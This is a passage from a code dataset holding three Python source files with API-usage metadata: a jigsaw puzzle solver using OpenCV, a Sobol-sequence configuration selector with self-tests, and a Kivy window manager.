"pylab.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 118, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 119, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 120, "usage_type": "call"}, {"api_name": "pylab.axhline", "line_number": 121, "usage_type": "call"}, {"api_name": "pylab.xlim", "line_number": 122, "usage_type": "call"}, {"api_name": "pylab.ylim", "line_number": 123, "usage_type": "call"}, {"api_name": "pylab.tight_layout", "line_number": 124, "usage_type": "call"}, {"api_name": "scipy.io.loadmat", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 160, "usage_type": "call"}]}
+{"seq_id": "231266970", "text": "import math, random, timeit, cv2, time, numpy as np\nfrom funcs import *\nfrom piece import pc\nnp.warnings.filterwarnings('ignore', category=np.VisibleDeprecationWarning)\n\nclass puzzle:\n def __init__(self, pcs, dims, startPiece=None):\n self.pcs = pcs\n assert dims[0]*dims[1]==len(pcs), f\"the given dimensions is not compatible with number of given pieces. len of array is {len(pcs)}\"\n self.unplaced = [e for e in pcs]\n self.placed = []\n self.dims = dims\n self.edgepcs = [e for e in self.pcs if sum(e.sideTypes==0) == 1]\n self.cornerpcs = [e for e in self.pcs if sum(e.sideTypes==0) == 2]\n self.solved = False\n self.maxX, self.maxY = 0, 0\n self.state = [[None]*dims[0] for i in range(dims[1])]\n\n if len(self.cornerpcs) > 0:\n s = self.cornerpcs[0] if startPiece==None else self.pcs[startPiece]\n r = [i for i in range(5) if s.sideTypes[i%4]==0 and s.sideTypes[(i+1)%4]==0]\n self.place(s, (0,0), r[0])\n\n self.cheat = [1, 3, 3, 3, 0, 0, 1, 0, 3, 2,\n 0, 1, 0, 3, 0, 0, 0, 1, 1, 3,\n 2, 0, 2, 2, 3, 2, 1, 2, 1, 3,\n 2, 2, 0, 0, 3, 1, 0, 0, 0, 1,\n 1, 1, 1, 2, 0, 0, 1, 2, 1, 0,\n 3, 2, 1, 2, 1, 1, 2, 0, 2, 3] \n\n def place(self, p, pos, r, keep=True, state=None):\n if type(p) == pc:\n p = [p]\n r = [r]\n pos = [pos]\n for i, pz in enumerate(p):\n pz.pos = pos[i]\n pz.rotation = r[i]\n assert not (keep and state!=None), \"cannot keep board state from hypothetical state input\"\n if keep and state==None:\n self.unplaced.remove(pz)\n self.placed.append(pz)\n self.solved = len(self.unplaced)==0\n self.maxX = pz.pos[0] if self.maxX 0:\n if prio:\n borders[4-m].append(pos)\n else:\n borders.append(pos)\n if prio:\n for i, e in enumerate(borders):\n if len(e) > 0:\n return 4-i, e\n return borders\n\n def bestPlacement(self, returnAll=False, maxPcs=3):\n numborder, spots = self.perimeterPositions()\n best = None\n if numborder == 1 and maxPcs >= 2:\n tspots = []\n dspots = self.canFit([(0,0),(1,0)], spots) + self.canFit([(0,0),(0,1)], spots)\n if maxPcs >= 3: tspots = self.canFit([(0,0),(1,0),(2,0)], spots) + self.canFit([(0,0),(0,1),(0,2)], spots)\n if len(dspots) > 0: spots = dspots\n if len(tspots) > 0: spots = tspots\n for spot in spots:\n pc, rot, score = self.bestFit(spot)\n if best==None or score < best[3]:\n best = (pc, spot, rot, score)\n if returnAll:\n return self.bestFit(best[1], returnAll=True)\n return best\n\n def canFit(self, shape, spots):\n assert (0,0) in shape, \"input shape must include (0, 0) and all relative positions to (0,0), if any\"\n can = []\n for spot in spots:\n relatives = {(spot[0]+p[0], spot[1]+p[1]) for p in shape}\n if relatives.issubset(set(spots)):\n can.append(list(relatives))\n return can\n\n def bestFit(self, pos, state=None, returnAll=False, scoreThreshold=25):\n sta = self.state if state==None else state\n best = None\n lol = []\n if type(pos[0]) == tuple and len(pos) == 1:\n pos = pos[0]\n if type(pos)==tuple:\n for pc in self.unplaced:\n for rot in range(4):\n score = self.evalPlacement(pc, pos, rot, state=sta)\n if best==None or score < best[2]:\n best = (pc, rot, score)\n if returnAll: lol.append((self.pcs.index(pc), pos, rot, score))\n else:\n for p in pos:\n assert type(p) == tuple, f\"position argument was not recognized as a tuple or list of tuples\"\n compatible = []\n total = 1\n for i in range(len(pos)):\n candidates, all = [], []\n noborders = len([1 for e in self.getBorders(pos[i]) if e != None]) == 0\n for r in range(4):\n for q in range(len(self.unplaced)):\n if not noborders:\n s = 
self.evalPlacement(self.unplaced[q], pos[i], r, state=sta)\n if s < scoreThreshold:\n candidates.append((self.unplaced[q], r))\n elif self.validEdgePlacement(self.unplaced[q], pos[i], r):\n all.append((self.unplaced[q], r))\n if len(candidates) == 0:\n candidates = all\n total *= len(candidates)\n compatible.append(candidates)\n dim = tuple(len(e) for e in compatible)\n print(f\"finding best for spots {pos}. search space is of dimensions {dim}: {total} possibilities\")\n for i in range(total):\n coord = np.unravel_index(i, dim)\n pzs, rs = [], []\n for j, e in enumerate(coord):\n pzs.append(compatible[j][e][0])\n rs.append(compatible[j][e][1])\n score = self.multiPlaceEval(pzs, pos, rs)\n if returnAll: lol.append(([self.pcs.index(e) for e in pzs], pos, rs, score))\n #print(f\"{coord}:{[self.pcs.index(x) for x in pzs]}, {rs}, score: {score}\")\n if best == None or score < best[2]:\n best = (pzs, rs, score)\n if returnAll:\n lol.sort(key=lambda x: -x[3])\n return lol\n #assert best[3] < 50, f\"No appropriate matches found for position/s {pos}. Best placement is {best}\"\n return best\n\n def multiPlaceEval(self, pzs, pos, rot, state=None, returnAll=False, scoreThreshold=25):\n assert len(pzs)==len(pos)==len(rot)>1, \"input lists are not of the same size, or are less than length 2\"\n fit = []\n st = state if state!=None else [[e for e in r] for r in self.state]\n for i, pc in enumerate(pzs):\n st = self.place(pc, pos[i], rot[i], state=st, keep=False)\n for i, pc in enumerate(pzs):\n f = self.evalPlacement(pc, pos[i], rot[i], state=st)\n if f>scoreThreshold: return 1e6\n fit.append(f)\n return sum(fit)/len(fit)\n\n def evalPlacement(self, p, pos, rot, state=None, show=False):\n sta = self.state if state==None else state\n borders = self.getBorders(pos, state=sta)\n scores = []\n ims = []\n for i, b in enumerate(borders):\n if b != None:\n o, s = b\n m = (rot-i+2)%4\n valid = self.validEdgePlacement(p, pos, rot)\n if valid:\n out = self.evalMatch((p, o), (m, s), show=show)\n if show:\n score, im = out\n scores.append(score)\n ims.append(im)\n else:\n scores.append(out)\n else:\n return 1e6\n assert len(scores) != 0, \"No match evaluation performed: 0 bordering edges.\"\n s = sum(scores)/len(scores)\n if show:\n t = np.array(ims[0], dtype=np.uint8)\n for i in range(1, len(ims)): \n st, sim = np.shape(t), np.shape(ims[i])\n diff = st[0] - sim[0]\n if diff > 0: ims[i] = np.pad(ims[i], ((0,diff),(0,0),(0,0)), \"constant\", constant_values=0)\n if diff < 0: t = np.pad(t, ((0,abs(diff)),(0,0),(0,0)), \"constant\", constant_values=0)\n t = np.concatenate((t, ims[i]), axis=1)\n return s, t\n return s\n\n def evalMatch(self, pieces, sidenums, ignoreRules=False, show=False, thickness=1, search=True):\n first, second = sidenums\n pc1, pc2 = pieces\n types1, types2 = pc1.sideTypes, pc2.sideTypes\n s1, s2 = pc1.correctedSides[first], pc2.correctedSides[second]\n validsides = True\n d = -1\n if (0 in types1) and (0 in types2):\n validsides = (types1[(first-1)%4]==0 and types2[(second+1)%4]==0) or (types1[(first+1)%4]==0 and types2[(second-1)%4]==0)\n elif (0 in types1) and (not 0 in types2):\n if sum(types1==0)==2:\n validsides = False\n else:\n i = np.where(types1==0)[0]\n validsides = not (first!=((i+2)%4))\n elif (not 0 in types1) and (0 in types2):\n if sum(types2==0)==2:\n validsides = False\n else:\n i = np.where(types2==0)[0]\n validsides = not (second!=((i+2)%4))\n elif pc1.sideTypes[first] == pc2.sideTypes[second] or (types1[first]==0) or (types2[second]==0):\n validsides = False\n else:\n d1, d2 = 
dist(s1[0], s1[-1]), dist(s2[0], s2[-1])\n d = abs(d1 - d2)\n validsides = d < 30\n validsides = validsides and not ignoreRules\n if not validsides:\n fit = 1e6\n else:\n s1, s2 = pc1.sides[first], pc2.sides[second]\n s1, s2 = s1 - s1[0], np.flipud(s2) - s2[-1]\n offset = math.atan2(s1[-1][1], s1[-1][0]) - math.atan2(s2[-1][1], s2[-1][0])\n s2 = rotate(s2, offset)\n fit = listSim(s1, s2)\n if search:\n stepsize = 1\n steps = 0\n decay = .96\n shifts = np.array([[-1,0], [1,0], [0,-1], [0,1]])\n fits = [listSim(s1-e, s2) for e in shifts]\n shifts = shifts*stepsize\n while fit-.02 > min(fits) and steps < 15:\n fit = listSim(s1, s2)\n shifts = shifts*(decay**steps)\n fits = [listSim(s1-e, s2) for e in shifts]\n steps += 1\n s1 = s1-shifts[np.argmin(fits)]\n #print(f\"improved score by {ofit-fit} after travelling {dist(s1o[0], s1[0])} pixels in {steps} steps\")\n if show:\n if not validsides:\n s1, s2 = s1 - s1[0], s2 - s2[0]\n\n x, y, w, h = cv2.boundingRect(np.append(s1, s2, axis=0).astype(np.float32))\n origin = [-70+x, -70+y]\n s1, s2 = np.array(s1)-origin, np.array(s2)-origin\n im = np.zeros((h+100, w+100, 3), np.uint8)\n im = cv2.putText(im, str(round(fit, 3)), (round(.5*w), 50), cv2.FONT_HERSHEY_DUPLEX, 1, color=(250, 80, 80), lineType=cv2.LINE_AA)\n im = cv2.polylines(im, np.int32([s1]), False, (50, 250, 50), thickness) # green is s1\n im = cv2.polylines(im, np.int32([s2]), False, (50, 0, 250), thickness) # red is s2\n #(round(.75*(h+100)), round(.75*(w+100)))\n return fit, im\n return fit\n\n def validEdgePlacement(self, p, pos, rot):\n x, y = pos\n w, h = self.dims\n if x == 0 and p.sideTypes[(rot+1)%4] != 0:\n return False\n if y == 0 and p.sideTypes[rot] != 0:\n return False\n if y == h-1 and p.sideTypes[(rot+2)%4] != 0:\n return False\n if x == w-1 and p.sideTypes[(rot-1)%4] != 0:\n return False\n if sum(p.sideTypes==0) > 0 and not (x in [0, w-1] or y in [0, h-1]):\n return False\n if sum(p.sideTypes==0) == 2 and pos not in [(0,0), (w-1,0), (w-1,h-1), (0,h-1)]:\n return False\n return True\n \n def showState(self, state=None):\n s = self.state if state==None else state\n for row in s:\n r = bcolors.OKBLUE\n for e in row:\n if e != None:\n idx = self.pcs.index(e)\n r += (\" \"+str(idx)+\" \" if idx < 10 else str(idx)+\" \")\n else:\n r += \" x \"\n print(r + bcolors.ENDC)\n \n def emptyState(self):\n return [[None]*self.dims[0] for i in range(self.dims[1])]\n\n def show(self, scale=1):\n tw = 0\n for pc in self.placed:\n w, h, d = np.shape(pc.cropped)\n tw = w if w > tw else tw\n pzl = np.ones((tw*(self.maxY+1), tw*(self.maxX+1), 3), dtype=np.uint8)*255\n\n rot = np.array([[math.cos(1.571), -math.sin(1.571)], [math.sin(1.571), math.cos(1.571)]])\n for pc in self.placed:\n x, y = pc.pos\n padded = np.ones((tw, tw, 3), dtype=np.uint8)*255\n ch, cw, d = np.shape(pc.cropped)\n if ch != cw:\n new = min(ch, cw)\n crop = cv2.resize(pc.cropped, (new, new), interpolation=cv2.INTER_NEAREST)\n padded[:new,:new] = crop\n else:\n padded[:ch,:cw] = pc.cropped\n\n c1, c2 = pc.croppedCorners[pc.rotation], pc.croppedCorners[(pc.rotation+1)%4]\n dir = (c1-c2)/dist(c1, c2)\n centerpt = [round((c1[0] + c2[0])/2), round((c1[1] + c2[1])/2)]\n perp = np.dot(dir, rot)\n tri = np.int32([[centerpt-55*dir-55*perp], [centerpt+55*dir-55*perp], [centerpt]])\n \n i = pc.rotation\n padded = cv2.fillPoly(padded, [tri], color=(250-70*i, 150-50*i, 80*i), lineType=cv2.LINE_AA)\n pzl[y*tw:(y+1)*tw, x*tw:(x+1)*tw] = padded\n\n return imscale(pzl, scale)", "sub_path": "puzzle/puzl.py", "file_name": "puzl.py", "file_ext": 
"py", "file_size_in_byte": 14774, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "numpy.warnings.filterwarnings", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.warnings", "line_number": 4, "usage_type": "attribute"}, {"api_name": "numpy.VisibleDeprecationWarning", "line_number": 4, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 32, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "piece.pc", "line_number": 95, "usage_type": "name"}, {"api_name": "piece.pc", "line_number": 97, "usage_type": "name"}, {"api_name": "piece.pc", "line_number": 118, "usage_type": "name"}, {"api_name": "piece.pc", "line_number": 120, "usage_type": "argument"}, {"api_name": "piece.pc", "line_number": 122, "usage_type": "name"}, {"api_name": "piece.pc", "line_number": 123, "usage_type": "argument"}, {"api_name": "numpy.unravel_index", "line_number": 147, "usage_type": "call"}, {"api_name": "piece.pc", "line_number": 167, "usage_type": "name"}, {"api_name": "piece.pc", "line_number": 168, "usage_type": "argument"}, {"api_name": "piece.pc", "line_number": 169, "usage_type": "name"}, {"api_name": "piece.pc", "line_number": 170, "usage_type": "argument"}, {"api_name": "numpy.array", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.shape", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 240, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 256, "usage_type": "call"}, {"api_name": "cv2.boundingRect", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 262, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 265, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 266, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_DUPLEX", "line_number": 266, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 266, "usage_type": "attribute"}, {"api_name": "cv2.polylines", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 267, "usage_type": "call"}, {"api_name": "cv2.polylines", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 268, "usage_type": "call"}, {"api_name": "piece.pc", "line_number": 307, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 308, "usage_type": "call"}, {"api_name": "piece.pc.cropped", "line_number": 308, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 308, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 310, 
"usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 312, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 312, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 312, "usage_type": "call"}, {"api_name": "piece.pc", "line_number": 313, "usage_type": "name"}, {"api_name": "piece.pc.pos", "line_number": 314, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 314, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 315, "usage_type": "attribute"}, {"api_name": "numpy.shape", "line_number": 316, "usage_type": "call"}, {"api_name": "piece.pc.cropped", "line_number": 316, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 316, "usage_type": "name"}, {"api_name": "cv2.resize", "line_number": 319, "usage_type": "call"}, {"api_name": "piece.pc.cropped", "line_number": 319, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 319, "usage_type": "name"}, {"api_name": "cv2.INTER_NEAREST", "line_number": 319, "usage_type": "attribute"}, {"api_name": "piece.pc.cropped", "line_number": 322, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 322, "usage_type": "name"}, {"api_name": "piece.pc.croppedCorners", "line_number": 324, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 324, "usage_type": "name"}, {"api_name": "piece.pc.rotation", "line_number": 324, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 328, "usage_type": "call"}, {"api_name": "piece.pc.rotation", "line_number": 330, "usage_type": "attribute"}, {"api_name": "piece.pc", "line_number": 330, "usage_type": "name"}, {"api_name": "cv2.fillPoly", "line_number": 331, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 331, "usage_type": "attribute"}]}
+{"seq_id": "233706711", "text": "__doc__ = \"\"\"\n Describes logic of selection algorithm based on Sobol sequences in Sobol space.\"\"\"\n\nimport sobol_seq\nimport logging\n\nfrom selection.selection_algorithm_abs import SelectionAlgorithm\nfrom scipy.spatial.distance import euclidean\nfrom itertools import product\n\n\nclass SobolSequence(SelectionAlgorithm):\n def __init__(self, experiment):\n \"\"\"\n Creates SobolSequence instance that stores information about number of generated points\n :param experiment: the instance of Experiment class\n \"\"\"\n\n self.search_space = experiment.description[\"DomainDescription\"][\"AllConfigurations\"]\n self.dimensionality = len(self.search_space)\n self.numOfGeneratedPoints = 0 # Counter of retrieved points from Sobol sequence.\n self.returned_points = [] # Storing previously returned points.\n self.hypercube_coordinates = []\n self.logger = logging.getLogger(__name__)\n\n # Need to use floating numbers of indexes for searching distances between target point\n # and other points in hypercube\n for dimension in self.search_space:\n dim_indexes = [float(x) for x in range(len(dimension))]\n self.hypercube_coordinates.append(dim_indexes)\n\n # Building hypercube\n self.hypercube = list(product(*self.hypercube_coordinates))\n\n def __generate_sobol_vector(self):\n \"\"\"\n Generates a next sobol vector in the current search space.\n :return: sobol vector as numpy array.\n \"\"\"\n\n # https://github.com/naught101/sobol_seq#usage\n vector, _ = sobol_seq.i4_sobol(self.dimensionality, self.numOfGeneratedPoints + 1)\n self.numOfGeneratedPoints += 1\n\n return vector\n\n def __impose_point_to_search_space(self, point):\n \"\"\"\n Generates sobol sequence of uniformly distributed data points in N dimensional space.\n :param number_of_data_points: int - number of points that needed to be generated in this iteration\n :param skip: int - number of points to skip from the beginning of sequence,\n because sobol_seq.i4_sobol_generate stateless.\n :return: sobol sequence as numpy array.\n Takes point with coordinates of exact configuration from search space and retrieves real configuration.\n :param point: list.\n :return: list. 
Configuration from search space.\n \"\"\"\n\n imposed_point = []\n\n for dimension_index, dimension_value in enumerate(point):\n imposed_point.append(self.search_space[int(dimension_index)][int(dimension_value)])\n\n return imposed_point\n\n def get_next_configuration(self):\n \"\"\"\n Will return next data point from initiated Sobol sequence imposed to the search space.\n :return: list - point in current search space.\n \"\"\"\n # Getting next point from sobol sequence.\n point = self.__generate_sobol_vector()\n\n # Imposed this point to hypercube dimension sizes.\n point = [len(self.hypercube_coordinates[dimension_index]) * dimension_value for dimension_index, dimension_value\n in enumerate(point)]\n\n # Calculate dictionary (keys - distance, values - point) with distances to self.numOfGeneratedPoints\n # nearest points in search space from this point.\n #\n # self.numOfGeneratedPoints + 1(and current point), because in the worst case we will\n # skip(because they was previously returned) this number of points\n\n distances_dict = {}\n for hypercube_point in self.hypercube:\n if len(distances_dict) < self.numOfGeneratedPoints + 1:\n distances_dict[euclidean(point, hypercube_point)] = hypercube_point\n elif len(distances_dict) == self.numOfGeneratedPoints + 1:\n distances = list(distances_dict.keys())\n distances.sort()\n del(distances_dict[distances.pop()])\n distances_dict[euclidean(point, hypercube_point)] = hypercube_point\n\n # Picking existing configuration point from hypercube by the smallest distance to generated by Sobol point,\n # if it was not previously picked.\n unique_point = None\n distances = list(distances_dict.keys())\n distances.sort()\n for current_distance in distances:\n candidate = self.__impose_point_to_search_space(distances_dict[current_distance])\n if candidate not in self.returned_points:\n unique_point = candidate\n self.returned_points.append(candidate)\n break\n if not unique_point:\n # In this point Sobol unable to generate unique configuration as all\n # configurations have been returned at least once.\n unique_point = self.__impose_point_to_search_space(point)\n self.logger.warn(\"Retrieving not unique configuration point from the Sobol selection algorithm!\")\n self.logger.debug(\"Retrieving new configuration from the Sobol sequence: %s\" % str(unique_point))\n return unique_point\n\n def __disable_point(self, point):\n \"\"\"\n This method should be used to let Sobol sequence know,\n that some points of search space have been already picked by prediction model.\n :param point: list. Point from search space.\n :return: None\n \"\"\"\n if point not in self.returned_points:\n self.returned_points.append(point)\n return True\n else:\n self.logger.warn(\"WARNING! Trying to disable point that have been already retrieved(or disabled).\")\n return False\n\n def disable_configurations(self, configurations):\n \"\"\"\n This method should be used to forbid points of the Search Space that \n have been already picked as a Model prediction.\n :param configurations: list of configurations. Configurations from search space.\n :return: None\n \"\"\"\n for p in configurations:\n self.__disable_point(p.get_parameters())\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Add these lines to the beginning of the script to be able to run it stand-alone. 
(fixes imports):\n\nfrom os import chdir\nfrom os.path import abspath\nfrom sys import path\nchdir('..')\npath.append(abspath('.'))\n \"\"\"\n from time import time\n from random import choice\n\n\n def test_for_duplicates(generated_configs):\n # helper function\n for config in generated_configs:\n if generated_configs.count(config) > 1:\n print(\"Repeated(%s times) configuration(%s) found!\" % (generated_configs.count(config), config))\n return True\n return False\n\n\n test_space = [[x for x in range(8)],\n [x / 10 for x in range(8)],\n [x * 10 for x in range(8)]] # 3D search space with 512 points in it.\n\n print(\"Testing the basic functionality for retrieving an unique points.\")\n started = time()\n sobol = SobolSequence(None, test_space)\n generated_configs = [sobol.get_next_configuration() for _ in range(len(list(product(*test_space))))]\n assert test_for_duplicates(generated_configs) is False, 'Got duplicates in normal search space.'\n print(\"Time to generate all(%s) points in these search space: %s \" % (len(generated_configs), time() - started))\n\n print(\"Testing basic functionality for retrieving more points that the search space contains. Duplicates appears.\")\n sobol = SobolSequence(None, test_space)\n generated_configs = [sobol.get_next_configuration() for _ in range(len(list(product(*test_space))) + 1)]\n assert test_for_duplicates(generated_configs) is True, 'Unique configs with exceeding search space, investigate.'\n\n print(\"Testing disabling the same point multiple times and further proper work of the Sobol.\")\n sobol = SobolSequence(None, test_space)\n configuration = choice(list(product(*test_space)))\n assert sobol.__disable_point(configuration) is True, \"Unable to disable configuration!\"\n assert sobol.__disable_point(configuration) is False, \"Able to disable same configuration twice!\"\n generated_configs = [sobol.get_next_configuration() for _ in range(len(list(product(*test_space))) - 1)]\n assert test_for_duplicates(generated_configs) is False, \"Got duplicates in search space with disabled configurations.\"\n\n print(\"Testing the multiple points disabling and further proper work of the Sobol.\")\n sobol = SobolSequence(None, test_space)\n for point in list(product(*test_space))[0: int(len(list(product(*test_space)))/3)]:\n sobol.__disable_point(point)\n generated_configs = [sobol.get_next_configuration() for _ in range(int(len(list(product(*test_space)))/3))]\n assert test_for_duplicates(generated_configs) is False, \\\n \"Got duplicates with multiple (%s) disabled points!\" % len(sobol.returned_points)\n\n print(\"\\nUnit test pass.\")\n", "sub_path": "main-node/selection/sobol.py", "file_name": "sobol.py", "file_ext": "py", "file_size_in_byte": 8964, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "selection.selection_algorithm_abs.SelectionAlgorithm", "line_number": 12, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 33, "usage_type": "call"}, {"api_name": "sobol_seq.i4_sobol", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.euclidean", "line_number": 87, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.euclidean", "line_number": 92, "usage_type": "call"}, {"api_name": "time.time", "line_number": 166, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 168, "usage_type": "call"}, {"api_name": "time.time", 
"line_number": 170, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 174, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 179, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 179, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 182, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 187, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 189, "usage_type": "call"}]}
+{"seq_id": "498805895", "text": "from kivy.properties import ObjectProperty\nfrom kivy.uix.screenmanager import NoTransition, ScreenManager\n\nfrom widgets import utils\nfrom widgets.homepage.HomePage import HomeScreen\nfrom widgets.Window import Window\nfrom widgets.navdrawer.helpmenu.HelpPage import HelpPage\n\n\nclass WindowManager(ScreenManager):\n nav_drawer = ObjectProperty()\n\n def __init__(self, **kwargs):\n super(WindowManager, self).__init__(**kwargs)\n # adding all the pages found in the pages json file and creating a new project if none are found\n\n utils.window_manager = self\n if len(utils.keys) == 1:\n self.add_widget(Window(utils.keys[0], utils.keys[0], utils.keys[0], utils.data[utils.keys[0]]))\n else:\n for window in utils.keys:\n if window == utils.keys[0] and utils.keys[utils.keys.index(window) + 1] is not None:\n self.add_widget(Window(window, window, utils.keys[utils.keys.index(window) + 1], utils.data[window]))\n elif window == utils.keys[-1] and utils.keys[utils.keys.index(window) - 1] is not None:\n self.add_widget(Window(window, utils.keys[utils.keys.index(window) - 1], window, utils.data[window]))\n else:\n self.add_widget(\n Window(window, utils.keys[utils.keys.index(window) - 1],\n utils.keys[utils.keys.index(window) + 1],\n utils.data[window]))\n self.home_screen = HomeScreen(self, \"home_select\")\n self.add_widget(self.home_screen)\n self.transition = NoTransition()\n self.current = \"home_select\"\n\n self.help_screen = HelpPage(\"help_page\")\n self.add_widget(self.help_screen)\n\n def add_null_window(self, window_data_key):\n # if len(utils.keys) == 1:\n new_win = Window(window_data_key, window_data_key, window_data_key, utils.data[window_data_key], False)\n # else:\n # new_win = Window(window_data_key, utils.windows[-2], window_data_key[-1], utils.data[window_data_key], False)\n self.add_widget(new_win)\n self.home_screen.home_select_page.add_card(window_data_key)\n utils.update_changes()\n", "sub_path": "widgets/WindowManager.py", "file_name": "WindowManager.py", "file_ext": "py", "file_size_in_byte": 2222, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "kivy.uix.screenmanager.ScreenManager", "line_number": 10, "usage_type": "name"}, {"api_name": "kivy.properties.ObjectProperty", "line_number": 11, "usage_type": "call"}, {"api_name": "widgets.utils.window_manager", "line_number": 17, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 17, "usage_type": "name"}, {"api_name": "widgets.utils.keys", "line_number": 18, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 18, "usage_type": "name"}, {"api_name": "widgets.Window.Window", "line_number": 19, "usage_type": "call"}, {"api_name": "widgets.utils.keys", "line_number": 19, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 19, "usage_type": "name"}, {"api_name": "widgets.utils.data", "line_number": 19, "usage_type": "attribute"}, {"api_name": "widgets.utils.keys", "line_number": 21, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 21, "usage_type": "name"}, {"api_name": "widgets.utils.keys", "line_number": 22, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 22, "usage_type": "name"}, {"api_name": "widgets.utils.keys.index", "line_number": 22, "usage_type": "call"}, {"api_name": "widgets.Window.Window", "line_number": 23, "usage_type": "call"}, {"api_name": "widgets.utils.keys", "line_number": 23, "usage_type": 
"attribute"}, {"api_name": "widgets.utils", "line_number": 23, "usage_type": "name"}, {"api_name": "widgets.utils.keys.index", "line_number": 23, "usage_type": "call"}, {"api_name": "widgets.utils.data", "line_number": 23, "usage_type": "attribute"}, {"api_name": "widgets.utils.keys", "line_number": 24, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 24, "usage_type": "name"}, {"api_name": "widgets.utils.keys.index", "line_number": 24, "usage_type": "call"}, {"api_name": "widgets.Window.Window", "line_number": 25, "usage_type": "call"}, {"api_name": "widgets.utils.keys", "line_number": 25, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 25, "usage_type": "name"}, {"api_name": "widgets.utils.keys.index", "line_number": 25, "usage_type": "call"}, {"api_name": "widgets.utils.data", "line_number": 25, "usage_type": "attribute"}, {"api_name": "widgets.Window.Window", "line_number": 28, "usage_type": "call"}, {"api_name": "widgets.utils.keys", "line_number": 28, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 28, "usage_type": "name"}, {"api_name": "widgets.utils.keys.index", "line_number": 28, "usage_type": "call"}, {"api_name": "widgets.utils.keys", "line_number": 29, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 29, "usage_type": "name"}, {"api_name": "widgets.utils.keys.index", "line_number": 29, "usage_type": "call"}, {"api_name": "widgets.utils.data", "line_number": 30, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 30, "usage_type": "name"}, {"api_name": "widgets.homepage.HomePage.HomeScreen", "line_number": 31, "usage_type": "call"}, {"api_name": "kivy.uix.screenmanager.NoTransition", "line_number": 33, "usage_type": "call"}, {"api_name": "widgets.navdrawer.helpmenu.HelpPage.HelpPage", "line_number": 36, "usage_type": "call"}, {"api_name": "widgets.Window.Window", "line_number": 41, "usage_type": "call"}, {"api_name": "widgets.utils.data", "line_number": 41, "usage_type": "attribute"}, {"api_name": "widgets.utils", "line_number": 41, "usage_type": "name"}, {"api_name": "widgets.utils.update_changes", 